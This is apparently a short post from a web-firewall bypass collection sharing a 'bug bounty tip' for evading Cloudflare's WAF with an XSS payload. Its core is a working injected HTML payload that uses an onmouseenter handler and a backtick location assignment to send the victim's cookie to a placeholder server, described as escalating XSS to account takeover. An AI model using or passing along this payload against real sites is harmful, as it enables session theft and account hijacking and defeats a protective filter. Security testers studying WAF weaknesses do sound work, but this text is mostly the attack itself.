CloudFlare bypass XSS by Assass1nmarcos

Date: June 4, 2022Author: wafbypass

New Cloudflare WAF Bypass to Fetch Cookie and Escalating XSS to Account Takeover.
As if you use document.location=URI (Blocked)
but using location=`URI` (Bypassed)

</body><body onControl anything hello onmouseenter=(location=`//yourserver.com?c=`%2bcookie) 1>
#bugbountytips

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools

How to test, evaluate, compare, and bypass web application and API security solutions like WAF, NGWAF, RASP, and WAAP

CloudFlare bypass XSS by Assass1nmarcos